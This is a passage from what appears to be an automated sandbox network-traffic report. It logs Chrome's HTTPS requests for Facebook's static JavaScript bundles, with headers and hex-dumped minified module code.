                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 66 6f 72 45 61 63 68 4f 62 6a 65 63 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 64 3b 67 2e 63 61 6c 6c 28 61 2c 65 29 26 26 62 2e 63 61 6c 6c 28 63 2c 61 5b 65 5d 2c 65 2c 61 29 7d 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 73 69 63 56 65 63 74 6f 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);__d("BasicVector",[],(function(a,b,c,d,e,f)
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC8350INData Raw: 63 2c 73 74 61 72 74 54 69 6d 65 3a 65 2c 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 3a 67 2c 73 6f 72 74 49 6e 64 65 78 3a 2d 31 7d 3b 65 3e 66 3f 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 65 2c 6c 28 74 2c 63 29 2c 6e 75 6c 6c 3d 3d 3d 6d 28 73 29 26 26 63 3d 3d 3d 6d 28 74 29 26 26 28 7a 3f 28 42 28 47 29 2c 47 3d 2d 31 29 3a 7a 3d 21 30 2c 4f 28 45 2c 65 2d 66 29 29 29 3a 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 67 2c 6c 28 73 2c 63 29 2c 79 7c 7c 78 7c 7c 28 79 3d 21 30 2c 4e 28 29 29 29 3b 72 65 74 75 72 6e 20 63 7d 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 73 68 6f 75 6c 64 59 69 65 6c 64 3d 4a 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 77 72 61 70 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 77 3b 72 65 74 75 72 6e 20 66 75 6e 63
                                                                                                                                                                                                                                Data Ascii: c,startTime:e,expirationTime:g,sortIndex:-1};e>f?(c.sortIndex=e,l(t,c),null===m(s)&&c===m(t)&&(z?(B(G),G=-1):z=!0,O(E,e-f))):(c.sortIndex=g,l(s,c),y||x||(y=!0,N()));return c};h.unstable_shouldYield=J;h.unstable_wrapCallback=function(c){var d=w;return func


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                37192.168.2.449783157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC581OUTGET /rsrc.php/v3/y-/r/C5TXdJzIETO.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: ZXUSaTUvXH/z41yDoCXizg==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:53:19 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: c00GeYQVzP3j7soP9wajkfj9iVOXdIAUOwNLMGZcJeQ8lHI2CtsbW/r0l76ZbM43BaBev3EHkoNgjZxtWbs7Bg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 4295
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC4294INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 58 44 4f 4d 53 63 61 6e 6e 65 72 52 65 73 75 6c 74 73 43 6f 6e 74 72 6f 6c 6c 65 72 52 6f 75 74 65 42 75 69 6c 64 65 72 22 2c 5b 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 61 3d 63 28 22 6a 73 52 6f 75 74 65 42 75 69 6c 64 65 72 22 29 28 22 2f 73 68 61 72 65 64 2f 75 73 65 72 5f 70 72 65 66 65 72 65 6e 63 65 73 2f 22 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 7d 29 2c 76 6f 69 64 20 30 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 44 4f 4d 53 63 61 6e 6e 65 72 22 2c 5b 22 42 61 73 65 36 34 22 2c 22 43 6f 6e 73 74 55 72 69 55 74 69 6c 73 22 2c 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);__d("DOMScanner",["Base64","ConstUriUtils","


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                38192.168.2.449784157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC581OUTGET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: ubkaRKiel1rYqBTqhjr0kQ==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 18:36:39 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 28csFJ4zP5Xsi1nycl4YyszgyfIToOJNnsSrkrZKrShSqnGdmlzcPPVy8XZoCT8ZbWLGT++OHNbzrdoTpKA7hw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 28815
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 41 64 61 70 74 65 72 22 2c 5b 22 63 72 3a 35 38 36 36 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 35 38 36 36 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 43 6f 6e 73 74 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 53 45 4e 44 3a 22 42 61 6e 7a 61 69 3a 53 45 4e 44 22 2c 4f 4b 3a 22 42 61 6e 7a 61 69 3a 4f 4b 22 2c 45 52 52 4f 52 3a 22 42 61 6e 7a 61 69 3a 45 52 52 4f 52 22 2c 53 48 55 54 44 4f 57 4e 3a 22 42 61 6e 7a 61 69 3a 53 48 55 54 44 4f 57 4e 22 2c 42 41 53 49 43 3a 22 62 61 73 69 63 22 2c 56 49 54
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VIT
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC12942INData Raw: 65 3d 73 28 61 2c 6a 2c 68 2d 6a 2c 64 2c 65 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 63 29 7b 64 6f 20 62 5b 63 5d 3d 61 26 31 32 37 2c 61 3d 61 3e 3e 3e 37 2c 61 3e 30 26 26 28 62 5b 63 5d 2b 3d 31 32 38 29 2c 63 2b 3d 31 3b 77 68 69 6c 65 28 61 3e 30 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 74 68 69 73 2e 61 72 72 61 79 3d 61 7d 78 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 78 43 6f 6d 70 72 65 73 73 65 64 4c 65 6e 67 74 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 61 72 72 61 79 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 20 33 32 2b 61 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 61 2f 36 29 7d 3b 78 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 72 65 73 73 54 6f 42
                                                                                                                                                                                                                                Data Ascii: e=s(a,j,h-j,d,e));return e}function w(a,b,c){do b[c]=a&127,a=a>>>7,a>0&&(b[c]+=128),c+=1;while(a>0);return c}function x(a){this.array=a}x.prototype.maxCompressedLength=function(){var a=this.array.length;return 32+a+Math.floor(a/6)};x.prototype.compressToB


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                39192.168.2.449789157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC592OUTGET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: d47OlUqeaNvCHt+edjdQkA==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 17:14:05 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: UzFWRZed8Isfz6GCVS6azRz3ICjW9q0Ms0y3yLzEa8p/2AM3zZX/oxuTZGigGmNJjN4nQz0wqBTTbMIJ5UcL8g==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:21 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 356545
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC15859INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 63 3d 62 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 63 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 43 68 61 6d 65 6c 65 6f 6e 54 68 65 6d 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";v
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 65 6f 66 20 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 65 2e 63 61 6c 6c 28 61 2c 62 3f 64 2e 76 61 6c 75 65 3a 2d 31 29 2c 64 2e 63 61 6e 54 61 62 3d 62 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 76 61 72 20 62 3d 61 2e 5f 74 61 62 49 6e 64 65 78 53 74 61 74 65 3b 69 66 28 21 62 29 72 65 74 75 72 6e 20 61 2e 74 61 62 49 6e 64 65 78 3e 30 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 62 2e 63 61 6e 54 61 62 7d 66 2e 73 65 74 45 6c 65 6d 65 6e 74 43 61 6e 54 61 62 3d 61 3b 66 2e 63 61 6e 45 6c 65 6d 65 6e 74 54 61 62 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 46 6f 63 75 73 52 65 67 69 6f 6e 2e 72 65 61 63 74 22 2c 5b 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 22 46 6f 63 75 73 4d 61 6e 61 67 65
                                                                                                                                                                                                                                Data Ascii: eof e==="function"&&(e.call(a,b?d.value:-1),d.canTab=b)}function b(a){var b=a._tabIndexState;if(!b)return a.tabIndex>0;else return b.canTab}f.setElementCanTab=a;f.canElementTab=b}),66);__d("FocusRegion.react",["ActiveFocusRegionUtilsContext","FocusManage
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 75 73 65 57 65 62 50 72 65 73 73 61 62 6c 65 54 6f 75 63 68 53 74 61 72 74 48 61 6e 64 6c 65 72 22 2c 5b 22 55 73 65 72 41 67 65 6e 74 22 2c 22 70 61 73 73 69 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 55 74 69 6c 22 2c 22 72 65 61 63 74 22 2c 22 75 73 65 44 79 6e 61 6d 69 63 43 61 6c 6c 62 61 63 6b 44 41 4e 47 45 52 4f 55 53 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 28 68 7c 7c 64 28 22 72 65 61 63 74 22 29 29 2e 75 73 65 45 66 66 65 63 74 3b 62 3d 63 28 22 55 73 65 72 41 67 65 6e 74 22 29 2e 69 73 42 72 6f 77 73 65 72 28 22 53 61 66 61 72 69 22 29 7c 7c 63 28 22 55 73 65 72 41 67 65 6e 74 22 29 2e 69 73 42 72 6f 77 73 65 72 28
                                                                                                                                                                                                                                Data Ascii: ;__d("useWebPressableTouchStartHandler",["UserAgent","passiveEventListenerUtil","react","useDynamicCallbackDANGEROUS"],(function(a,b,c,d,e,f,g){"use strict";var h,i=(h||d("react")).useEffect;b=c("UserAgent").isBrowser("Safari")||c("UserAgent").isBrowser(
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC16384INData Raw: 63 74 69 6f 6e 22 29 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 6f 6d 65 74 46 65 65 64 4c 6f 67 67 69 6e 67 45 78 74 72 61 46 69 65 6c 64 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 7d 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 6f 6d 65 74 54 72 61 63 6b 69 6e 67 43 6f 64 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73
                                                                                                                                                                                                                                Data Ascii: ction"));g["default"]=b}),98);__d("CometFeedLoggingExtraFieldsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext({});g["default"]=b}),98);__d("CometTrackingCodeContext",["react"],(function(a,b,c,d,e,f,g){"us
                                                                                                                                                                                                                                2024-09-29 04:54:21 UTC1500INData Raw: 7a 65 3a 22 78 6e 67 6e 73 6f 32 22 2c 77 6f 72 64 57 72 61 70 3a 22 78 31 76 76 6b 62 73 22 2c 24 24 63 73 73 3a 21 30 7d 2c 68 72 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 78 34 32 78 30 79 61 22 2c 62 6f 72 64 65 72 54 6f 70 53 74 79 6c 65 3a 22 78 31 65 6a 71 33 31 6e 22 2c 62 6f 72 64 65 72 45 6e 64 53 74 79 6c 65 3a 22 78 64 31 30 72 78 78 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 53 74 79 6c 65 3a 22 78 31 73 79 30 65 74 72 22 2c 62 6f 72 64 65 72 53 74 61 72 74 53 74 79 6c 65 3a 22 78 31 37 72 30 74 65 65 22 2c 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 3a 22 78 39 37 32 66 62 66 22 2c 62 6f 72 64 65 72 45 6e 64 57 69 64 74 68 3a 22 78 63 66 75 78 36 6c 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 57 69 64 74 68 3a 22 78 31 71 68 68 39
                                                                                                                                                                                                                                Data Ascii: ze:"xngnso2",wordWrap:"x1vvkbs",$$css:!0},hr:{backgroundColor:"x42x0ya",borderTopStyle:"x1ejq31n",borderEndStyle:"xd10rxx",borderBottomStyle:"x1sy0etr",borderStartStyle:"x17r0tee",borderTopWidth:"x972fbf",borderEndWidth:"xcfux6l",borderBottomWidth:"x1qhh9
